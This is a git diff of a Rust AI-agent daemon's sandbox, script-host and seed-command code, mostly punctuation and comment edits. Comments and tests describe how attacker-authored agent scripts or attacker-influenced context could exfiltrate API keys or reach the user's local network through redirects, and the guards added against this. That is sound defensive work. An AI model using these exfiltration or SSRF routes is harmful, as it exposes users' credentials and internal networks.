         // otherwise show a live run that no longer exists.
         let meta: RunMeta = serde_json::from_str(
             &std::fs::read_to_string(runs.path().join("run-badpath").join("meta.json")).unwrap(),
@@ -1372,7 +1372,7 @@ mod tests {
     fn marking_a_crash_is_best_effort() {
         // The run directory can vanish between the scan and the rewrite (a
         // concurrent `lev rm`, a wiped runs dir). Recovery must log and carry
-        // on — the daemon is mid-startup and the other runs still need it.
+        // on - the daemon is mid-startup and the other runs still need it.
         let runs = tempfile::tempdir().unwrap();
         write_run(
             runs.path(),

--- a/crates/leviath-cli/src/daemon/sandbox_manager.rs
+++ b/crates/leviath-cli/src/daemon/sandbox_manager.rs
@@ -5,7 +5,7 @@
 //! keyed and deduplicated by config signature so identical configs across stages
 //! share one warm container), routes each shell call to the *current* stage's
 //! sandbox, and tears every container down at reap. `namespace` and `none` kinds
-//! need no persistent state — they are pure per-exec command wrapping.
+//! need no persistent state - they are pure per-exec command wrapping.
 //!
 //! It implements [`leviath_tools::ShellExecutor`], so the built-in shell tool
 //! runs its command inside the sandbox transparently; file tools stay on the
@@ -26,7 +26,7 @@ use tokio::process::Command as TokioCommand;
 
 /// POSIX shell used *inside* a container. Every image ships `/bin/sh`, whereas
 /// the host's detected shell (e.g. `/bin/zsh` on macOS) generally isn't present
-/// in the image — so container exec must use its own shell, not the host's.
+/// in the image - so container exec must use its own shell, not the host's.
 const CONTAINER_SHELL: &str = "sh";
 const CONTAINER_SHELL_FLAG: &str = "-c";
 
@@ -51,17 +51,17 @@ pub struct SandboxManager {
     containers: HashMap<u64, LiveContainer>,
     /// Per-stage-index resolved sandbox config; immutable after construction.
     by_index: Vec<ToolSandboxConfig>,
-    /// Whether Linux namespaces are usable on this host — captured at build so
+    /// Whether Linux namespaces are usable on this host - captured at build so
     /// `build_command` (the `ShellExecutor` hot path) doesn't re-probe and both
     /// its namespace arms are reachable regardless of the test platform.
     namespace_ok: bool,
-    /// The current stage's config — the only mutable state, swapped on stage
+    /// The current stage's config - the only mutable state, swapped on stage
     /// change (the manager lives behind an `Arc`, so interior mutability).
     current: StdMutex<ToolSandboxConfig>,
 }
 
 /// Signature identifying a distinct container: same engine + image + network +
-/// mounts → one shared warm container. (Deterministic within a process —
+/// mounts → one shared warm container. (Deterministic within a process -
 /// `DefaultHasher` uses fixed keys.)
 fn signature(cfg: &ToolSandboxConfig) -> u64 {
     let mut h = std::collections::hash_map::DefaultHasher::new();
@@ -86,7 +86,7 @@ fn sanitize(run_id: &str) -> String {
         .collect()
 }
 
-/// Build the host shell command (no sandbox) — the exact prior behavior.
+/// Build the host shell command (no sandbox) - the exact prior behavior.
 fn host_command(shell: &str, flag: &str, command: &str, workdir: &Path) -> TokioCommand {
     let mut c = TokioCommand::new(shell);
     c.arg(flag).arg(command).current_dir(workdir);
@@ -97,7 +97,7 @@ impl SandboxManager {
     /// Build the manager for an agent whose stages resolve (in order) to
     /// `by_index`, bind-mounting `workdir`. `entry_index` selects the initial
     /// stage's config. Returns `Ok(None)` when nothing is sandboxed (the common
-    /// case — the caller then attaches no executor and shell runs on the host).
+    /// case - the caller then attaches no executor and shell runs on the host).
     /// Returns `Err` when a required runtime is unavailable and that config's
     /// `on_unavailable` is `Error`.
     pub fn build(
@@ -165,7 +165,7 @@ impl SandboxManager {
                     let Some(engine) = cfg.engine.clone().or_else(|| detected.clone()) else {
                         unavailable(
                             cfg,
-                            "no container engine found — install docker or podman, \
+                            "no container engine found - install docker or podman, \
                              or set `engine` in [sandbox]",
                             &containers,
                             run,
@@ -731,7 +731,7 @@ mod tests {
     }
 
     // Live end-to-end verification against a real container engine is not a
-    // compiled test here — an `#[ignore]`d test still counts as uncovered against
+    // compiled test here - an `#[ignore]`d test still counts as uncovered against
     // the crate's hard-100% coverage gate. To verify the real create → exec →
     // destroy path manually (with a container daemon running):
     //

--- a/crates/leviath-cli/src/daemon/script_host.rs
+++ b/crates/leviath-cli/src/daemon/script_host.rs
@@ -1,4 +1,4 @@
-//! The daemon's real [`ScriptHost`] for Rhai script tools (issue #97, Layer 3).
+//! The daemon's real [`ScriptHost`] for Rhai script tools (permission Layer 3).
 //!
 //! A registered script tool reaches the outside world only through the host
 //! functions on [`leviath_scripting::ScriptHost`]. This module supplies the real
@@ -420,14 +420,14 @@ pub struct RealScriptIo;
 /// The one process-wide blocking HTTP client for script tools.
 ///
 /// Built once, then cloned per request. A `reqwest::blocking::Client` owns a
-/// dedicated OS thread running a current-thread tokio runtime, so the previous
-/// build-one-per-request shape spawned (and tore down) a thread plus a runtime
+/// dedicated OS thread running a current-thread tokio runtime, so a
+/// build-one-per-request shape spawns (and tears down) a thread plus a runtime
 /// plus a TLS root-store load for *every* `http_get` - a researcher agent
-/// fanning out over dozens of pages could exhaust thread/FD limits, at which
-/// point `build()` fails and the `.expect` panics inside a Rhai native call
-/// (issue #109). One shared client also gives connection reuse across calls.
+/// fanning out over dozens of pages can exhaust thread/FD limits, at which
+/// point `build()` fails and the `.expect` panics inside a Rhai native call.
+/// One shared client also gives connection reuse across calls.
 ///
-/// The builder can still only fail on TLS-backend init, and that failure is now
+/// The builder can still only fail on TLS-backend init, and that failure is
 /// contained: `leviath_scripting`'s native-function guards turn a panic here
 /// into an ordinary script error instead of aborting the daemon.
 static HTTP_CLIENT: std::sync::LazyLock<reqwest::blocking::Client> =
@@ -679,8 +679,9 @@ impl ScriptIo for RealScriptIo {
         // runtime worker), so blocking on the current runtime is safe here and
         // lets us reuse tokio's timeout - the same mechanism the built-in shell
         // tool uses. `try_current` rather than `current`: a blocking thread can
-        // outlive runtime shutdown, and `current` would *panic* there - which,
-        // inside a Rhai native call, used to abort the daemon (issue #109).
+        // outlive runtime shutdown, and `current` would *panic* there - and a
+        // panic inside a Rhai native call is the shape that can abort the
+        // daemon (issue #109).
         let Ok(handle) = tokio::runtime::Handle::try_current() else {
             return Err("shell is unavailable: no tokio runtime on this thread".to_string());
         };
@@ -864,10 +865,10 @@ mod tests {
         assert_eq!(eff.http_post, ScriptPermission::Allow);
     }
 
-    /// The manifest may not loosen what the user locked down. This previously
-    /// went the other way - a downloaded agent setting `http_get = "allow"` over
-    /// a global `deny` got the network back, which made the user's config
-    /// advisory rather than binding.
+    /// The manifest may not loosen what the user locked down. The other way
+    /// round - a downloaded agent setting `http_get = "allow"` over a global
+    /// `deny` getting the network back - makes the user's config advisory
+    /// rather than binding.
     #[test]
     fn effective_perms_agent_cannot_loosen_global() {
         let global = perms(ScriptPermission::Deny);

--- a/crates/leviath-cli/src/daemon/script_host.rs
+++ b/crates/leviath-cli/src/daemon/script_host.rs
@@ -11,7 +11,7 @@
 //! path-confinement logic is unit-testable with a fake, and the real
 //! network/process/filesystem/env behavior ([`RealScriptIo`]) is exercised with
 //! hermetic, local resources (a mock HTTP server, `echo`, temp files, scoped env
-//! vars) — the same approach the MCP and package-registry tests use.
+//! vars) - the same approach the MCP and package-registry tests use.
 
 use std::collections::BTreeMap;
 use std::path::{Component, Path, PathBuf};
@@ -83,7 +83,7 @@ pub fn resolve_script_permissions(
 }
 
 /// Map a `[tool_script_permissions]` string to a [`ScriptPermission`]. An
-/// unrecognized value yields `None` (the field is left at the global default) —
+/// unrecognized value yields `None` (the field is left at the global default) -
 /// parsed by hand (not via `Deserialize`) so every arm is deterministically
 /// covered, without pulling in serde's unexercised visitor machinery.
 fn parse_script_permission_str(s: &str) -> Option<ScriptPermission> {
@@ -110,7 +110,7 @@ fn script_restrictiveness(p: ScriptPermission) -> u8 {
 
 /// The effective `[tool_script_permissions]` for an agent: the user's global
 /// config with the agent's own blueprint `[tool_script_permissions]` overlaid
-/// per field — but **only where the manifest is more restrictive**.
+/// per field - but **only where the manifest is more restrictive**.
 ///
 /// Agents ship their own `.rhai` tool scripts, so it is reasonable for a
 /// manifest to say "this agent never needs `shell`". It is not reasonable for it
@@ -127,7 +127,7 @@ pub fn effective_script_permissions(
 ) -> ScriptToolPermissions {
     let mut eff = global.clone();
     // `toml::from_str`, not `manifest_toml.parse::<toml::Value>()`. In toml 1.x
-    // `FromStr for Value` parses a single *value*, not a document — so a real
+    // `FromStr for Value` parses a single *value*, not a document - so a real
     // manifest starting with `[agent]` reads as an array literal followed by
     // junk and fails. It still compiles, so the change is silent; the tests are
     // what caught it.
@@ -193,7 +193,7 @@ pub struct DaemonScriptHost {
     io: Arc<dyn ScriptIo>,
     /// The agent's sandbox manager, if any. When present, a script `shell()`
     /// call runs inside the *current* stage's sandbox (container / namespace),
-    /// exactly like the built-in `shell` tool — a script can't escape the
+    /// exactly like the built-in `shell` tool - a script can't escape the
     /// isolation the agent's stage declared. `None` runs on the host.
     sandbox: Option<Arc<SandboxManager>>,
     /// Wall-clock cap on a single `shell()` call, so a runaway command can't hang
@@ -201,7 +201,7 @@ pub struct DaemonScriptHost {
     shell_timeout: Duration,
     /// `[security] allow_local_network`: whether this agent's fetches may reach
     /// loopback / private / link-local addresses. Off unless the user turned it
-    /// on — see [`check_outbound`].
+    /// on - see [`check_outbound`].
     allow_local_network: bool,
     /// `[security] allow_env_vars`: credential-shaped environment variables this
     /// agent's scripts may read. Empty by default.
@@ -317,7 +317,7 @@ fn denied(func: &str) -> String {
 /// Check a script-supplied URL against the outbound policy before it is sent.
 ///
 /// The URL came from the model, and the model picked it out of context an
-/// attacker can influence — so this is the boundary between "the agent browsing
+/// attacker can influence - so this is the boundary between "the agent browsing
 /// the web" and "the agent probing the user's own network on someone else's
 /// behalf". See [`leviath_core::net`] for what is refused and why.
 ///
@@ -397,7 +397,7 @@ impl ScriptHost for DaemonScriptHost {
         // A script tool ships inside the agent bundle, so this call is
         // attacker-authored in exactly the case that matters. Ordinary variables
         // pass; a credential-shaped name needs the user to have listed it. Two
-        // lines — `env_var("ANTHROPIC_API_KEY")` then `http_post(...)` — was
+        // lines - `env_var("ANTHROPIC_API_KEY")` then `http_post(...)` - was
         // otherwise a working exfiltration path with no prompt in it anywhere.
         if !leviath_core::script_env_allowed(name, &self.allow_env_vars) {
             return Err(format!(
@@ -422,7 +422,7 @@ pub struct RealScriptIo;
 /// Built once, then cloned per request. A `reqwest::blocking::Client` owns a
 /// dedicated OS thread running a current-thread tokio runtime, so the previous
 /// build-one-per-request shape spawned (and tore down) a thread plus a runtime
-/// plus a TLS root-store load for *every* `http_get` — a researcher agent
+/// plus a TLS root-store load for *every* `http_get` - a researcher agent
 /// fanning out over dozens of pages could exhaust thread/FD limits, at which
 /// point `build()` fails and the `.expect` panics inside a Rhai native call
 /// (issue #109). One shared client also gives connection reuse across calls.
@@ -455,7 +455,7 @@ static HTTP_CLIENT: std::sync::LazyLock<reqwest::blocking::Client> =
 /// Flatten an error and its `source` chain into one `": "`-joined line.
 ///
 /// reqwest's own `Display` for a refused redirect is "error following redirect
-/// for url (…)" — it never mentions the reason, which for us is the whole point:
+/// for url (…)" - it never mentions the reason, which for us is the whole point:
 /// "refused to follow redirect: private address" and "too many redirects" are
 /// different problems with different fixes, and both were reaching the script
 /// author as the same opaque sentence.
@@ -476,7 +476,7 @@ fn error_chain(e: &dyn std::error::Error) -> String {
 /// field on the host. This atomic exists only because [`HTTP_CLIENT`] is
 /// process-wide and its redirect callback runs inside reqwest with no access to
 /// the host that started the request. `[security] allow_local_network` is a
-/// machine-wide switch, so one value per process is the right granularity —
+/// machine-wide switch, so one value per process is the right granularity -
 /// but keep the field authoritative and this a mirror of it, not the reverse:
 /// global mutable state read by the main check would make every test that
 /// touches it race with every test that doesn't.
@@ -518,7 +518,7 @@ impl RealScriptIo {
     /// A body the `Content-Type` marks as binary is refused rather than decoded.
     /// `Response::text` decodes *anything* lossily, so a PNG or MP3 came back as
     /// a page of U+FFFD replacement characters reported as a **successful**
-    /// fetch — no error, no signal, straight into the model's context.
+    /// fetch - no error, no signal, straight into the model's context.
     fn send(req: reqwest::blocking::RequestBuilder) -> Result<String, String> {
         Self::send_capped(req, MAX_RESPONSE_BYTES)
     }
@@ -543,7 +543,7 @@ impl RealScriptIo {
         // Refuse an oversized body before reading a byte of it. `text()` buffers
         // the whole response, so a server advertising a multi-gigabyte
         // `text/plain` is a memory-exhaustion DoS the 900 KB output cap below
-        // does nothing about — that cap runs *after* the allocation.
+        // does nothing about - that cap runs *after* the allocation.
         //
         // Residual: a chunked response sends no `Content-Length`, so a body that
         // lies about its size is still buffered. The client's 30-second timeout
@@ -567,7 +567,7 @@ impl RealScriptIo {
 /// The check is on the declared type, deliberately **not** on UTF-8 validity of
 /// the bytes: `Response::text` is charset-aware and decodes Shift-JIS,
 /// ISO-8859-1 and Windows-1252 pages *correctly*, and a strict `from_utf8` test
-/// would misclassify exactly those as binary — the non-English pages a
+/// would misclassify exactly those as binary - the non-English pages a
 /// researcher agent is most likely to fetch. Anything unrecognised (including a
 /// missing header) falls through to the existing text path.
 const BINARY_CONTENT_PREFIXES: &[&str] = &[
@@ -609,13 +609,13 @@ fn non_text_body_message(content_type: &str, len: Option<u64>) -> String {
         Some(bytes) => format!(", {} KB", bytes.div_ceil(1024)),
         None => String::new(),
     };
-    format!("non-text content ({content_type}{size}) — this tool returns text only")
+    format!("non-text content ({content_type}{size}) - this tool returns text only")
 }
 
 /// Cap a host-I/O string below the tool engine's 1 MB `max_string_size`
 /// (`build_tool_engine`) so an oversized fetch/read/shell result can't raise the
 /// NON-CATCHABLE `ErrorDataTooLarge` inside a Rhai tool script (it aborts the tool
-/// even inside try/catch). This is only a crash guard — context-size truncation is
+/// even inside try/catch). This is only a crash guard - context-size truncation is
 /// handled downstream by region budgets and any in-script truncation.
 const MAX_SCRIPT_IO_BYTES: usize = 900_000;
 
@@ -631,14 +631,14 @@ const MAX_RESPONSE_BYTES: u64 = 32 * 1024 * 1024;
 /// The refusal message for an over-large declared body, or `None` to proceed.
 ///
 /// Split out as a pure function with an injectable `max` so the threshold is
-/// testable without a 32 MB HTTP round trip — and because a mock server cannot
+/// testable without a 32 MB HTTP round trip - and because a mock server cannot
 /// help here anyway: hyper panics rather than send a `Content-Length` that
 /// disagrees with the body it is writing, so the lying-header case that motivates
 /// the check is unreachable from an honest test server.
 fn oversized_body_message(content_length: Option<u64>, max: u64) -> Option<String> {
     match content_length {
         Some(len) if len > max => Some(format!(
-            "response declares {len} bytes, over the {max}-byte limit — \
+            "response declares {len} bytes, over the {max}-byte limit - \
              fetch a more specific page"
         )),
         _ => None,
@@ -647,7 +647,7 @@ fn oversized_body_message(content_length: Option<u64>, max: u64) -> Option<Strin
 
 pub(crate) fn cap_script_io(mut s: String) -> String {
     if s.len() > MAX_SCRIPT_IO_BYTES {
-        // Cut on a char boundary — a raw byte cut-off lands mid-character on
+        // Cut on a char boundary - a raw byte cut-off lands mid-character on
         // multi-byte text and panics (the shape of issue #109).
         s.truncate(floor_char_boundary(&s, MAX_SCRIPT_IO_BYTES));
         s.push_str("\n[...truncated by leviath: response exceeded 900 KB]");
@@ -677,9 +677,9 @@ impl ScriptIo for RealScriptIo {
     fn run_shell(&self, mut cmd: TokioCommand, timeout: Duration) -> Result<String, String> {
         // The script engine drives this from a `spawn_blocking` thread (not a
         // runtime worker), so blocking on the current runtime is safe here and
-        // lets us reuse tokio's timeout — the same mechanism the built-in shell
+        // lets us reuse tokio's timeout - the same mechanism the built-in shell
         // tool uses. `try_current` rather than `current`: a blocking thread can
-        // outlive runtime shutdown, and `current` would *panic* there — which,
+        // outlive runtime shutdown, and `current` would *panic* there - which,
         // inside a Rhai native call, used to abort the daemon (issue #109).
         let Ok(handle) = tokio::runtime::Handle::try_current() else {
             return Err("shell is unavailable: no tokio runtime on this thread".to_string());
@@ -687,7 +687,7 @@ impl ScriptIo for RealScriptIo {
         // Reap the whole command tree if the future is dropped (timeout, or the
         // batch dropped because the agent was cancelled) rather than detaching
         // it. `kill_on_drop` covers the shell; its own children are reparented
-        // to init unless the group is signalled — see `leviath_tools`' shell
+        // to init unless the group is signalled - see `leviath_tools`' shell
         // tool, which does the same.
         cmd.kill_on_drop(true);
         leviath_tools::own_process_group(&mut cmd);
@@ -755,7 +755,7 @@ pub(crate) fn default_shell() -> (&'static str, &'static str) {
     }
 }
 
-/// Build the host (un-sandboxed) shell command pointed at `workdir` — the
+/// Build the host (un-sandboxed) shell command pointed at `workdir` - the
 /// no-sandbox arm of [`DaemonScriptHost::shell`].
 pub(crate) fn host_shell_command(
     shell: &str,
@@ -865,7 +865,7 @@ mod tests {
     }
 
     /// The manifest may not loosen what the user locked down. This previously
-    /// went the other way — a downloaded agent setting `http_get = "allow"` over
+    /// went the other way - a downloaded agent setting `http_get = "allow"` over
     /// a global `deny` got the network back, which made the user's config
     /// advisory rather than binding.
     #[test]
@@ -1044,7 +1044,7 @@ mod tests {
 
     /// The exfiltration/SSRF case: a script tool with `http_get` permission is
     /// still not a licence to reach the user's own network. Nothing may touch
-    /// the I/O backend — the URL is refused before a request is built.
+    /// the I/O backend - the URL is refused before a request is built.
     #[test]
     fn outbound_check_blocks_local_targets_before_any_io() {
         let io = RecordingIo::arc();
@@ -1096,7 +1096,7 @@ mod tests {
         );
     }
 
-    /// Ordinary variables are unaffected — a script reading `PATH` or its own
+    /// Ordinary variables are unaffected - a script reading `PATH` or its own
     /// app's setting is normal, and the gate would be useless if it broke that.
     #[test]
     fn env_var_allows_ordinary_names() {
@@ -1107,7 +1107,7 @@ mod tests {
     }
 
     /// The user allowlisting a name is them saying "yes, this agent is meant to
-    /// have that one" — and only that one.
+    /// have that one" - and only that one.
     #[test]
     fn env_var_allowlist_permits_exactly_the_named_variable() {
         let io = RecordingIo::arc();
@@ -1232,7 +1232,7 @@ mod tests {
         let host =
             DaemonScriptHost::with_io(all_allowed(), dir.path().to_path_buf(), RecordingIo::arc());
         // A path that is *absolute on the current platform* (a leading `/` is not
-        // absolute on Windows — it needs a drive/UNC prefix), and outside the
+        // absolute on Windows - it needs a drive/UNC prefix), and outside the
         // workdir. `temp_dir()` is absolute everywhere and a sibling of the
         // workdir tempdir, so it exercises the `is_absolute()` → true branch.
         let outside = std::env::temp_dir().join("leviath-abs-outside-xyz");
@@ -1283,7 +1283,7 @@ mod tests {
                     )
                 }),
             )
-            // Declared text in a non-UTF-8 charset — must still decode, which is
+            // Declared text in a non-UTF-8 charset - must still decode, which is
             // why the guard reads the header rather than testing UTF-8 validity.
             .route(
                 "/shiftjis",
@@ -1388,7 +1388,7 @@ mod tests {
     }
 
     /// A body at or under the cap proceeds, and so does one with no declared
-    /// length — a chunked response has none, and refusing every chunked page
+    /// length - a chunked response has none, and refusing every chunked page
     /// would break most of the web.
     #[test]
     fn body_within_cap_or_of_unknown_size_proceeds() {
@@ -1398,7 +1398,7 @@ mod tests {
     }
 
     /// The cap in the real `send` path, against a small response with the limit
-    /// lowered — the 32 MiB production value would mean transferring 32 MiB to
+    /// lowered - the 32 MiB production value would mean transferring 32 MiB to
     /// assert one branch.
     #[tokio::test(flavor = "multi_thread")]
     async fn send_refuses_a_body_over_the_cap() {
@@ -1416,7 +1416,7 @@ mod tests {
 
     /// A redirect is a fresh destination the caller's original URL check never
     /// saw, so the policy re-checks every hop. Here a public-looking request is
-    /// bounced to loopback — the shape that turns any redirect-following fetch
+    /// bounced to loopback - the shape that turns any redirect-following fetch
     /// into an SSRF primitive.
     #[tokio::test(flavor = "multi_thread")]
     async fn redirects_to_a_local_address_are_refused() {
@@ -1427,7 +1427,7 @@ mod tests {
         let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
         let addr = listener.local_addr().unwrap();
         // Only `/bounce` is served: if the guard ever fails open, the request
-        // 404s instead of succeeding, and the test still fails -- but no handler
+        // 404s instead of succeeding, and the test still fails - but no handler
         // sits here unreached on the passing path.
         let app = Router::new().route(
             "/bounce",
@@ -1568,7 +1568,7 @@ mod tests {
     }
 
     /// A raw TCP server that declares a larger Content-Length than it sends, then
-    /// closes — so `resp.text()` errors on the incomplete body (mirrors the
+    /// closes - so `resp.text()` errors on the incomplete body (mirrors the
     /// package-registry truncated-body test).
     async fn spawn_truncated_body_server() -> String {
         use tokio::io::{AsyncReadExt, AsyncWriteExt};

--- a/crates/leviath-cli/src/daemon/seed_command.rs
+++ b/crates/leviath-cli/src/daemon/seed_command.rs
@@ -1,4 +1,4 @@
-//! Execution of `seed = { command = "..." }` region seeds (issue #108).
+//! Execution of `seed = { command = "..." }` region seeds.
 //!
 //! A command seed runs a shell command in the run's workdir at spawn and puts
 //! its combined stdout/stderr into the region - but only when the command
@@ -34,8 +34,8 @@ use crate::daemon::script_host::{
 ///
 /// Injected rather than called directly so the failure arms (timeout, spawn
 /// failure, non-zero exit) are testable without spawning real processes. The
-/// production implementation is built by [`SeedCommandPolicy::new`]. Mirrors the
-/// `BrowserOpener` seam from issue #99.
+/// production implementation is built by [`SeedCommandPolicy::new`]. Mirrors
+/// the `BrowserOpener` seam.
 pub type SeedCommandRunner =
     Arc<dyn Fn(&str, &Path, Duration) -> Result<String, String> + Send + Sync>;
 

--- a/crates/leviath-cli/src/daemon/seed_command.rs
+++ b/crates/leviath-cli/src/daemon/seed_command.rs
@@ -1,21 +1,21 @@
 //! Execution of `seed = { command = "..." }` region seeds (issue #108).
 //!
 //! A command seed runs a shell command in the run's workdir at spawn and puts
-//! its combined stdout/stderr into the region — but only when the command
+//! its combined stdout/stderr into the region - but only when the command
 //! *succeeds*; a non-zero exit is reported as an error so a diagnostic never
 //! masquerades as data. It is the only seed source that *executes* anything, and
-//! it does so before the first inference — therefore before any tool-approval
-//! prompt — so it is deliberately hemmed in:
-//!
-//! - it is skipped entirely unless [`SeedCommandPolicy::allowed`] (the
+//! it does so before the first inference - therefore before any tool-approval
+//! prompt - so it is deliberately hemmed in:
+//! -
+//! it is skipped entirely unless [`SeedCommandPolicy::allowed`] (the
 //!   `[security] allow_seed_commands` config switch and the `--no-seed-commands`
-//!   launch flag);
-//! - it runs inside the entry stage's sandbox when the agent declares one,
+//!   launch flag); -
+//! it runs inside the entry stage's sandbox when the agent declares one,
 //!   using the same [`ShellExecutor::build_command`] routing as the built-in
-//!   `shell` tool, so a seed can't escape the isolation the stage asked for;
-//! - it is capped in wall-clock time (`[limits] script_shell_timeout_secs`) and
-//!   in output size (`cap_script_io`);
-//! - it never runs on restart — [`crate::daemon::spawn`] only resolves seeds on
+//!   `shell` tool, so a seed can't escape the isolation the stage asked for; -
+//! it is capped in wall-clock time (`[limits] script_shell_timeout_secs`) and
+//!   in output size (`cap_script_io`); -
+//! it never runs on restart - [`crate::daemon::spawn`] only resolves seeds on
 //!   a fresh spawn.
 
 use std::path::Path;
@@ -62,7 +62,7 @@ impl SeedCommandPolicy {
         }
     }
 
-    /// A policy that never runs anything — used on the reload/restore path and
+    /// A policy that never runs anything - used on the reload/restore path and
     /// wherever seeds are resolved without a live sandbox.
     pub fn disabled() -> Self {
         Self {
@@ -100,7 +100,7 @@ fn seed_command_runner(sandbox: Option<Arc<SandboxManager>>) -> SeedCommandRunne
 }
 
 /// Build the command for a seed: through the agent's sandbox when it has one,
-/// else straight onto the host — both targeting the run's workdir.
+/// else straight onto the host - both targeting the run's workdir.
 ///
 /// Split from execution so the routing decision is assertable without spawning
 /// anything (and without depending on whether the host's namespaces actually
@@ -121,16 +121,16 @@ fn build_seed_command(
 /// stdout+stderr (capped by `cap_script_io`) on success.
 ///
 /// **A non-zero exit is an error, not data.** The combined output of a failed
-/// command is a diagnostic — `git ls-files` outside a repository prints
-/// `fatal: not a git repository` — and returning it as the seed value would
+/// command is a diagnostic - `git ls-files` outside a repository prints
+/// `fatal: not a git repository` - and returning it as the seed value would
 /// plant that text in a pinned region as though it were the file listing the
 /// blueprint promised. The caller logs it and leaves the region empty instead
 /// (or fails the spawn, when the region is `required`).
 ///
 /// This runs on a freshly spawned OS thread with its own current-thread runtime
 /// rather than reusing the ambient one. `resolve_seeds` is a synchronous
-/// function called from an async context, so `Handle::current().block_on(...)`
-/// — the trick `RealScriptIo::run_shell` uses from its `spawn_blocking` thread —
+/// function called from an async context, so `Handle::current().block_on(...)` -
+/// the trick `RealScriptIo::run_shell` uses from its `spawn_blocking` thread -
 /// would panic here. A dedicated thread has no ambient runtime, and going
 /// through tokio (rather than `std::process`) buys a real timeout: dropping the
 /// `output()` future on expiry kills the child via `kill_on_drop`, instead of
@@ -259,7 +259,7 @@ mod tests {
     fn real_runner_times_out_a_long_command() {
         let policy = SeedCommandPolicy::new(true, Duration::from_millis(150), None);
         // Each platform's own idiom for "sleep". `#[cfg]` rather than `cfg!` so
-        // only the arm for THIS platform is compiled — the other would otherwise
+        // only the arm for THIS platform is compiled - the other would otherwise
         // count as unreachable code against the coverage gate.
         #[cfg(windows)]
         let long = "ping -n 30 127.0.0.1 > NUL";
@@ -288,7 +288,7 @@ mod tests {
     }
 
     /// With a sandbox attached the command is built BY the manager rather than
-    /// straight onto the host — the same routing the built-in `shell` tool uses,
+    /// straight onto the host - the same routing the built-in `shell` tool uses,
     /// so a seed can't escape the isolation the entry stage declared.
     ///
     /// This asserts the routing, not the execution: whether a namespace is

--- a/crates/leviath-cli/src/daemon/setup.rs
+++ b/crates/leviath-cli/src/daemon/setup.rs
@@ -317,18 +317,19 @@ pub fn build_host(
 
 /// Create the run directory and write a `Starting` `meta.json` for a run that is
 /// about to be built, so a spawn that dies partway through still leaves something
-/// on disk to explain itself (issue #107: 3/13 empty runs crashed before any
-/// state existed). Everything the agent hasn't resolved yet - model, stage names,
-/// stage count - is left blank; the first persistence tick overwrites the file
-/// with the real thing. Best-effort: a failure here must not block the spawn.
+/// on disk to explain itself (in one live batch, 3 of 13 empty runs crashed
+/// before any state existed). Everything the agent hasn't resolved yet - model,
+/// stage names, stage count - is left blank; the first persistence tick
+/// overwrites the file with the real thing. Best-effort: a failure here must not
+/// block the spawn.
 ///
 /// Writes under the host's configured `runs_dir` - the same directory the
 /// persistence lane and the reloader use. It deliberately does *not* go through
 /// `runstate::create_run`, which resolves the runs dir globally from
-/// `dirs::home_dir()`: that ignored a daemon configured with a different runs dir
-/// and, because `dirs::home_dir()` cannot be redirected by `$HOME` on macOS, let
-/// any test that spawned through a real host write placeholder runs into the
-/// developer's own `~/.leviath/runs` (where they then showed as permanently
+/// `dirs::home_dir()`: that ignores a daemon configured with a different runs
+/// dir and, because `dirs::home_dir()` cannot be redirected by `$HOME` on macOS,
+/// lets any test that spawns through a real host write placeholder runs into the
+/// developer's own `~/.leviath/runs` (where they then show as permanently
 /// ACTIVE, since nothing would ever advance them).
 fn write_placeholder_meta(runs_dir: &std::path::Path, args: &leviath_runtime::host::SpawnArgs) {
     // The real agent name lives in the blueprint, which hasn't been parsed yet -
@@ -367,7 +368,7 @@ async fn warm_blueprint_mcp(pool: &crate::daemon::mcp_pool::McpPool, blueprint_p
 
 /// Pre-warm the MCP servers declared by this blueprint's `worker_agent` /
 /// `worker_query` fan-out workers, so the *first* worker spawned advertises them
-/// immediately instead of one turn late (issue #97). `worker_stage` workers reuse
+/// immediately instead of one turn late. `worker_stage` workers reuse
 /// the parent's own blueprint, already warmed by [`warm_blueprint_mcp`], so they
 /// are skipped here. A worker source that can't be read/resolved is skipped.
 /// Extracted from the preprocessor closure so its body is unit-testable.
@@ -533,9 +534,10 @@ mod tests {
         assert_eq!(rx.await.unwrap(), Ok("run-s".to_string()));
     }
 
-    /// Issue #107: 3/13 empty runs died before any state existed, leaving nothing
-    /// on disk to diagnose. The spawner stakes out the run directory first, so a
-    /// spawn that fails at *any* later step still leaves a `meta.json`.
+    /// A spawn can die before any state exists (3 of 13 empty runs in one live
+    /// batch), leaving nothing on disk to diagnose. The spawner stakes out the
+    /// run directory first, so a spawn that fails at *any* later step still
+    /// leaves a `meta.json`.
     #[tokio::test]
     async fn spawner_pre_creates_the_run_dir_even_when_the_spawn_fails() {
         let runs = tempfile::tempdir().unwrap();
@@ -652,11 +654,11 @@ mod tests {
         );
     }
 
-    /// End-to-end for the reported bug: a run whose blueprint no longer exists
-    /// cannot be rebuilt, so the reloader declines - and the cancel used to stop
-    /// there, replying "no such run" and writing nothing, leaving `meta.json`
-    /// claiming the run was live with no way to ever clear it. It must now be
-    /// terminated on disk instead.
+    /// End-to-end for the unkillable-run shape: a run whose blueprint no longer
+    /// exists cannot be rebuilt, so the reloader declines - and a cancel that
+    /// stops there, replying "no such run" and writing nothing, leaves
+    /// `meta.json` claiming the run is live with no way to ever clear it. It
+    /// must be terminated on disk instead.
     #[tokio::test]
     async fn cancelling_an_unreloadable_run_terminates_it_on_disk() {
         let runs = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/daemon/setup.rs
+++ b/crates/leviath-cli/src/daemon/setup.rs
@@ -2,7 +2,7 @@
 //! interaction hub + the blueprint spawner) ready to be driven by
 //! [`WorldHost::serve`]. The async setup (provider registry, MCP connections)
 //! happens in the binary and is passed in; this wiring is synchronous and
-//! testable — spawning an agent through the installed spawner exercises the whole
+//! testable - spawning an agent through the installed spawner exercises the whole
 //! path.
 
 use std::sync::Arc;
@@ -53,11 +53,11 @@ pub fn build_marker_path() -> Option<std::path::PathBuf> {
 }
 
 /// Record [`CURRENT_BUILD`] so the CLI can detect a stale daemon later.
-/// Best-effort — a missing marker just triggers a restart on the next command.
+/// Best-effort - a missing marker just triggers a restart on the next command.
 pub fn write_build_marker() {
     // Combinators (rather than `if let`) so the "no home dir" / "no parent"
     // fallbacks don't add branches that can't be exercised where a home always
-    // resolves — mirroring `control_address`'s `.map` style.
+    // resolves - mirroring `control_address`'s `.map` style.
     build_marker_path().into_iter().for_each(|path| {
         let _ = path.parent().map(std::fs::create_dir_all);
         let _ = std::fs::write(&path, CURRENT_BUILD);
@@ -72,7 +72,7 @@ pub fn read_build_marker() -> Option<String> {
 }
 
 /// Whether a running daemon should be restarted because it is on a different
-/// build than this CLI (or recorded no build at all — e.g. it predates this
